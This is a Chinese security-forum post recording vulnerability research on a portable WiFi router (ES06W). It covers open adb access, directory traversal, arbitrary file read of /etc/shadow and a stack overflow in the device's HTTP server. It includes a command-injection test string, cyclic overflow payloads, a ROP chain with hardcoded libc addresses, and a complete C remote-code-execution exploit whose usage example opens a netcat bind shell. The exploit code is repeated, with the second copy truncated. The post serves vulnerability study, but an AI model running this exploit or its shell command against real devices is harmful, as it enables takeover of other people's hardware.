[原创]对一个随身WIFI设备的漏洞挖掘尝试-智能设备-看雪-安全社区|安全招聘|kanxue.com

[原创]对一个随身WIFI设备的漏洞挖掘尝试

发表于: 2022-8-5 19:53 26657

[原创]对一个随身WIFI设备的漏洞挖掘尝试

okCryingFish 活跃值

2022-8-5 19:53

26657

最近买了一个随时WIFI设备，正好自己在学习漏洞挖掘，于是拿这个练练手。
设备版本信息：

首先扫描了下设备开放的端口。设备开放了22、80、443、5555、8080、9090等多个端口。SSH爆破测试了下，密码不是弱密码没什么突破。

443、9090端口访问会返回404，可能需要其他参数，没什么突破。
图片描述
设备开放了5555调试端口，可以直接通过adb连接获取设备权限。继续查找有没有其可利用的点。访问8080端口默认跳转到了http://192.168.0.1:8080/vad_update.html页面。该页面提供了设备升级、日志下载和APN设置功能。

查看BurpSuite历史记录，发现http://192.168.0.1/file_list.json?dir=请求比较有意思，dir指定目录，返回包返回了json格式的目录信息。
图片描述

尝试通过dir参数进行目录遍历，如/file_list.json?dir=../../../../../，确认存在目录遍历漏洞。

继续查看BurpSuite历史记录，发现http://192.168.0.1/apns-conf.xml请求也比较有意思，URI指定了一个文件名，返回包是文件内容。
图片描述
于是尝试通过URI进行目录遍历读取文件，确认存在任意文件读取漏洞。这时利用任意文件读取漏洞可以读取到/etc/shadow的SSH密码了，可以尝试破解密码后直接使用SSH登录。

接下来准备把HTTP服务程序拿出来分析下。设备默认开启了5555端口，可以直接通过adb连接拿到设备权限。通过看看连接状态可以确定/opt/ejoin/bin/vfd就是HTTP服务程序。
图片描述

/opt/ejoin/bin/vfd为32位ARM架构，定位到HTTP请求解析的代码进行分析。首先尝试寻找命令注入漏洞。但是发现vfd中没有system、popen函数，执行命令是调用的sub_C1F4函数。

sub_C1F4函数内部调用sub_12024函数，sub_12024函数内部通过调用/opt/ejoin/var/pipe/vshd程序传递参数执行命令。
图片描述
于是查找引用sub_12024函数的地方，sub_12280和sub_12294都不能控制参数，只有sub_122A8函数中参数似乎是可控的。sub_122A8函数中将a1参数拼接到“cd %s”命令中执行。

继续查找引用sub_122A8函数的地方，发现只有一个地址。通过调式信息来看，传递给sub_122A8函数的a1参数为一个目录。
图片描述
继续查找交叉引用，最终发现目录来自http://192.168.0.1/Uplog.html请求的filename参数。

于是构造下列请求http://192.168.0.1:8080/uplog.html?filename=/etc/passwd&fileurl=123进行测试，正好WEB页面可以下载vfd日志，从日志中看出，vfd将filename指定的路径分割出目录和文件名，并切换到相应的目录并压缩文件。
图片描述
尝试构造http://192.168.0.1:8080/uplog.html?filename=/etc/;id/../../../etc/passwd&fileurl=123请求进行测试，发现代码中会对filename指向的文件是否存在进行判断，暂时没法绕过进行命令注入。

于是尝试查找vfd解析请求的代码中的栈溢出漏洞。发现解析http://192.168.0.1/file_list.json?dir=请求时，sub_EE48函数会将dir参数的内容拼接到栈空间s中，s只有256字节大小，这里存在一个栈溢出漏洞。
图片描述
继续查找发现sub_D7A8函数在解析读取文件的请求时，直接将URI拷贝到栈空间s，s只有280字节大小，也存在栈溢出漏洞。

这里尝试对sub_D7A8函数中的栈溢出漏洞进行利用。adb连接设备后通过gdb调式vfd程序。构造如下POC发送：

根据PC寄存器地址定位到要覆盖的返回地址偏移为261。
图片描述
修改POC如下，就可以将PC寄存器劫持为指定的地址了。

图片描述
漏洞函数在返回时执行POP {R4-R7,PC}，因此R4-R7寄存器也是可以控制的。

系统没有随机基址，漏洞利用较为简单，只需要避免字符串截断就行。因此直接从libc库中查找到MOV R0,SP; LDR R2,[R7]; BLX R2;指令的地址0x48d50294用来覆盖返回地址。
图片描述
漏洞函数返回后，SP指向覆盖的返回地址后面，就可以通过URL的内容来控制R0寄存器指向的字符串。R2寄存器可以用R7来控制。Libc中system函数地址为0x48CEA830。找到一个指向system函数地址的指针0x48CB5FBC来控制R7寄存器。

从新构造如下POC后调式：
图片描述
触发漏洞后执行到0x48d50294时，R7为控制的0x48CB5FBC。

此时SP指向用来覆盖返回地址的值后面，可以将要执行的命令拼接在URL末尾来执行命令。

执行到BLX R2指令时，R2就是system函数地址了。

测试EXP：

EXP：

software_version = V4565R03C01S61

hardware_version = M2V1

product_model = ES06W

upgrade_version = V4565R03C01S61

software_version = V4565R03C01S61

hardware_version = M2V1

product_model = ES06W

upgrade_version = V4565R03C01S61

http://192.168.0.1:8080/

aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHaIaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbibjbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTbUbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccdcecfcgchcicjckclcmcncocpcqcrcsctcucvcwcxcycz

http://192.168.0.1:8080/

aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHaIaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbibjbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTbUbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccdcecfcgchcicjckclcmcncocpcqcrcsctcucvcwcxcycz

http://192.168.0.1:8080/

aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHaIaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbibjbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTbUbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccdc123DDDD

http://192.168.0.1:8080/

aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHaIaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbibjbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTbUbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccdc123DDDD

// ES06W-RCE.cpp : 

//
#include "stdafx.h"
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <WinSock2.h>
#include <Windows.h>
 
#pragma comment(lib, "ws2_32.lib")
 
void ShowHelp()
{

    printf("[+]Usage: ES06W-RCE.exe [Command]\n");

    printf("[+]Example: ES06W-RCE.exe \"nc${IFS}-lp${IFS}4444${IFS}-e${IFS}/bin/sh\"\n");
}
 
int main(int argc, char** argv)
{

    WSADATA stcData = {};

    int int_ret = 0;

    char str_recv[0x1000] = {};

    char str_payload_final[0x1000] = {};
 
    //

    if (argc != 2) {

        ShowHelp();

        return 0;

    }

    //

    int_ret = WSAStartup(MAKEWORD(2, 2), &stcData);

    if (int_ret == SOCKET_ERROR) {

        printf("[-]Init Failed!\n");

        return 0;

    }

    //
 
    char str_payload[] = {

        "GET /aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHa"

        "IaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbib"

        "jbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTb"

        "UbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccd"

        "\xBC\x5F\xCB\x48"                    //Control R7

        "\x94\x02\xD5\x48"                    //Return Addr

        "%s"                                //Command

        " HTTP/1.1\r\n"       

        "Host: 192.168.0.1:8080\r\n"

        "Connection: keep-alive\r\n"

        "Upgrade-Insecure-Requests: 1\r\n"

        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\r\n"

        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n"

        "Accept-Encoding: gzip, deflate\r\n"

        "Accept-Language: zh-CN,zh;q=0.9\r\n\r\n\0"

    };
 
    sprintf_s(str_payload_final, 0x1000, str_payload, argv[1]);
 
    //

    SOCKET sock_client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    sockaddr_in sock_addr;

    sock_addr.sin_family = AF_INET;

    sock_addr.sin_port = htons(8080);

    sock_addr.sin_addr.S_un.S_addr = inet_addr("192.168.0.1");

    //

    int nErrCode = 0; 

    int_ret = connect(sock_client, (sockaddr*)&sock_addr, sizeof(sockaddr_in));

    //

    send(sock_client, str_payload_final, strlen(str_payload_final), 0);

    //

    Sleep(20);

    recv(sock_client, str_recv, sizeof(str_recv), 0);

    printf("[-]Recv: %s\n", str_recv);
 
    printf("[+]Finished!\n");

    closesocket(sock_client);

    WSACleanup();

    //

    return 0;
}

// ES06W-RCE.cpp :

//

#include "stdafx.h"

#define _WINSOCK_DEPRECATED_NO_WARNINGS

#include <WinSock2.h>

#include <Windows.h>

#pragma comment(lib, "ws2_32.lib")

void ShowHelp()

{

printf("[+]Usage: ES06W-RCE.exe [Command]\n");

printf("[+]Example: ES06W-RCE.exe \"nc${IFS}-lp${IFS}4444${IFS}-e${IFS}/bin/sh\"\n");

}

int main(int argc, char** argv)

{

WSADATA stcData = {};

int int_ret = 0;

char str_recv[0x1000] = {};

char str_payload_final[0x1000] = {};

//

if (argc != 2) {

ShowHelp();

return 0;

}

//

int_ret = WSAStartup(MAKEWORD(2, 2), &stcData);

if (int_ret == SOCKET_ERROR) {

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

#安全研究 #漏洞分析 #漏洞挖掘 #家用设备

收藏・31

免费・18

支持

最新回复 (11)
tank小王子雪币： 12476 活跃值： (9432) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 152 粉丝 1 关注私信	tank小王子 2 楼老哥牛啤，羡慕这系统安全和web安全都能搞的全能选手。。。 2022-8-5 21:05 0
pureGavin 雪币： 14530 活跃值： (17548) 能力值： ( LV12，RANK：290 ) 在线值：发帖 84 回帖 1418 粉丝 259 关注私信	pureGavin 3 3 楼感谢分享 2022-8-7 23:21 0
jackbow 雪币： 319 活跃值： (347) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 1 关注私信	jackbow 4 楼感谢分享 2022-8-8 11:15 0
windy_ll 雪币： 2914 活跃值： (4946) 能力值： ( LV8，RANK：130 ) 在线值：发帖 17 回帖 66 粉丝 81 关注私信	windy_ll 2 5 楼 666 2022-8-8 15:09 0
suuuuu 雪币： 864 活跃值： (5124) 能力值： ( LV2，RANK：10 ) 在线值：发帖 22 回帖 299 粉丝 8 关注私信	suuuuu 6 楼 2022-8-9 11:59 0
时光无声雪币： 220 活跃值： (118) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	时光无声 7 楼 666 2022-8-9 15:06 0
万剑归宗雪币： 914 活跃值： (2468) 能力值： ( LV5，RANK：68 ) 在线值：发帖 6 回帖 519 粉丝 36 关注私信	万剑归宗 1 8 楼 2022-8-10 09:44 0
青眼白龙雪币： 4076 活跃值： (4817) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 151 粉丝 1 关注私信	青眼白龙 9 楼学习了，感谢分享 2022-8-10 19:12 0
mb_qmtzgzzj 雪币：能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 1 关注私信	mb_qmtzgzzj 10 楼 666 2022-10-13 09:42 0
夏天呀雪币： 2117 活跃值： (2064) 能力值： ( LV2，RANK：15 ) 在线值：发帖 2 回帖 40 粉丝 6 关注私信	夏天呀 11 楼太强了，逆向、审计、渗透、代码能力都是全能啊，膜拜大佬！ 2022-10-13 11:28 0
mb_eiurpggt 雪币： 18 能力值： ( LV1，RANK：0 ) 在线值：发帖 2 回帖 5 粉丝 1 关注私信	mb_eiurpggt 12 楼师傅这款是用的那一款产品想跟着复现一下 2022-11-19 18:06 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

okCryingFish

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (11)
tank小王子雪币： 12476 活跃值： (9432) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 152 粉丝 1 关注私信	tank小王子 2 楼老哥牛啤，羡慕这系统安全和web安全都能搞的全能选手。。。 2022-8-5 21:05 0
pureGavin 雪币： 14530 活跃值： (17548) 能力值： ( LV12，RANK：290 ) 在线值：发帖 84 回帖 1418 粉丝 259 关注私信	pureGavin 3 3 楼感谢分享 2022-8-7 23:21 0
jackbow 雪币： 319 活跃值： (347) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 1 关注私信	jackbow 4 楼感谢分享 2022-8-8 11:15 0
windy_ll 雪币： 2914 活跃值： (4946) 能力值： ( LV8，RANK：130 ) 在线值：发帖 17 回帖 66 粉丝 81 关注私信	windy_ll 2 5 楼 666 2022-8-8 15:09 0
suuuuu 雪币： 864 活跃值： (5124) 能力值： ( LV2，RANK：10 ) 在线值：发帖 22 回帖 299 粉丝 8 关注私信	suuuuu 6 楼 2022-8-9 11:59 0
时光无声雪币： 220 活跃值： (118) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	时光无声 7 楼 666 2022-8-9 15:06 0
万剑归宗雪币： 914 活跃值： (2468) 能力值： ( LV5，RANK：68 ) 在线值：发帖 6 回帖 519 粉丝 36 关注私信	万剑归宗 1 8 楼 2022-8-10 09:44 0
青眼白龙雪币： 4076 活跃值： (4817) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 151 粉丝 1 关注私信	青眼白龙 9 楼学习了，感谢分享 2022-8-10 19:12 0
mb_qmtzgzzj 雪币：能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 1 关注私信	mb_qmtzgzzj 10 楼 666 2022-10-13 09:42 0
夏天呀雪币： 2117 活跃值： (2064) 能力值： ( LV2，RANK：15 ) 在线值：发帖 2 回帖 40 粉丝 6 关注私信	夏天呀 11 楼太强了，逆向、审计、渗透、代码能力都是全能啊，膜拜大佬！ 2022-10-13 11:28 0
mb_eiurpggt 雪币： 18 能力值： ( LV1，RANK：0 ) 在线值：发帖 2 回帖 5 粉丝 1 关注私信	mb_eiurpggt 12 楼师傅这款是用的那一款产品想跟着复现一下 2022-11-19 18:06 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复